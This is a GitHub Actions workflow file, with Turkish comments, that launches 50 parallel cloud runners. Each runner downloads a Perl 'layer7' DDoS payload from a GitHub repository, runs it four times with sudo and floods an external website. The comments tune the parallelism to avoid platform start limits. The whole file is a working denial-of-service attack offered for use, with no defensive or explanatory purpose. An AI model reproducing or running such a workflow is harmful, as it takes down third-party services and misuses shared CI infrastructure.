name: TekPoyraz !

on:
  workflow_dispatch:

jobs:
  vds:
    runs-on: ubuntu-latest
    strategy:
      # Paralel çalışacak makine sayısını, hızlı başlatma limitini aşmayacak şekilde 50'ye düşürdük.
      max-parallel: 50
      matrix:
        # Sadece 50 iş başlat. Kuyrukta beklemeye son!
        instance: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50]

    steps:
      - name: OK !
        run: |
          wget https://github.com/Cisc0-gif/KITT/raw/4ba19aff41f9627d5c7c8a27bcfacb84e253206d/payloads/ddos/layer7.pl -O layer7.pl
          chmod +x layer7.pl
          PIDS=()
          for i in {1..4}; do
            sudo timeout 20 perl layer7.pl http://graph.vshield.pro/ 1400 1400 15 &
            PIDS+=($!)
          done
          
          for pid in "${PIDS[@]}"; do
            wait $pid
          done

      - name: OK !
        run: |
          sleep 20
          exit 0
